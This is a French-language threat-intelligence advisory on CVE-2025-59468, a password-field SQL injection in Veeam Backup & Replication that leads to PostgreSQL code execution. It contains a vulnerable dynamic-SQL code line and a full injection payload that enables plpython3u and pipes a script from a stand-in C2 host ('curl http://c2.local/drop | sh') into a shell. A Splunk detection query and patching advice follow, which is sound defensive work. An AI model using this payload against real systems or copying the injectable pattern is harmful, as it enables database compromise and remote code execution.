Aller au contenu

CVE-2025-59468 : exécution de code PostgreSQL via le paramètre password dans Veeam Backup & Replication

HERMES

HERMES THREAT SCORE & RISQUE DE GESTIONNAIRE D'IDENTIFIANTS

Cible : Module de gestion des identifiants et base PostgreSQL Veeam Backup & Replication
Confiance : 98%
90 / 100
CRITIQUE

Mesure la pertinence opérationnelle réelle, la militarisation de l'exploit et la posture de menace active.

Décomposition des dimensions
Exploitabilité 18 / 20
Activité de menace 16 / 20
Militarisation 19 / 20
Exposition 16 / 20
Prévalence 19 / 20
Impact 20 / 20
Maturité de l'exploit 18 / 20
Potentiel d'attaque en chaîne 20 / 20
⚖️ Divergence & Justification opérationnelle

Hermes classe la CVE-2025-59468 à 90 (CRITIQUE). Bien que la soumission d'identifiants requière des privilèges d'administration sur la console, l'injection permet de s'extraire de l'application pour exécuter des commandes directement au niveau de la couche de données PostgreSQL. Cette faille facilite le mouvement latéral furtif et le dépôt d'implants de persistance dans le cluster de base de données sans déclencher les alertes de l'interface graphique.

🕸️ Graphe de connaissances connecté & Provenance

CVE-2025-59468: PostgreSQL Remote Code Execution via Malicious Password Parameter in Veeam Backup & ReplicationVULNÉRABILITÉ

Nœuds connectés : 1
Relations sortantes actives
→ affectsCOMPOSANTVeeam Backup & Replication
98% VERY_HIGH

Software platform affected by security vulnerabilities and agentic attack patterns.

🔍 Pourquoi cette relation ? (Preuves & Provenance)

“Confirmed security vulnerability in Veeam Backup & Replication documented in Hermes dossier.”

Preuves vérifiées associées :

ParamètreSpécification techniqueImpact opérationnel
Identifiant CVECVE-2025-59468Identifiant officiel NVD / MITRE
Avis de sécurité éditeurVeeam KB4716Correctif de sécurité cumulatif VBR v13
Composant affectéGestionnaire d’identifiants (Credentials Manager)Enregistrement des secrets d’infrastructure
Versions affectéesVBR 13.x $\le$ 13.0.1.180Installations sous PostgreSQL
Version corrigéeVeeam Backup & Replication 13.0.1.1071Mise à niveau recommandée
Privilèges requisBackup Administrator (authentifié)Console VBR ou API d’administration
Impact finalExécution de code postgresPersistance base de données et RCE

Le gestionnaire de secrets de Veeam prend en charge le chiffrement asymétrique des mots de passe. Toutefois, avant le passage dans l’algorithme de chiffrement, une routine de vérification de conformité et d’insertion temporaire dans la table de session utilisait une chaîne SQL dynamique :

// Modèle conceptuel du bug :
string insertSql = $"INSERT INTO temp_credentials (user_id, raw_entropy, test_hash) VALUES ('{userId}', '{passwordInput}', '{hash}')";

En fournissant un mot de passe contenant des délimiteurs de requête :

P@ssword123'; CREATE EXTENSION IF NOT EXISTS plpython3u; DO $$ import os; os.system('curl http://c2.local/drop | sh') $$; --

Le serveur PostgreSQL interprète le mot de passe comme une séquence d’instructions SQL complètes, exécutant les commandes sous l’identité de l’instance PostgreSQL.


index=postgresql_logs ("CREATE EXTENSION" OR "COPY" OR "DO $$")
(query="*temp_credentials*" OR query="*credentials*")
| table _time user database query client_addr
  1. Appliquer immédiatement le correctif KB4716 : mettre à niveau vers la version 13.0.1.1071.
  2. Surveillance des requêtes DDL suspectes : activer l’extension pgaudit pour tracer les instructions DO et CREATE EXTENSION sur la base Veeam.
  3. Segmentation réseau du serveur de sauvegarde : isoler le serveur VBR des flux sortants non sollicités vers Internet.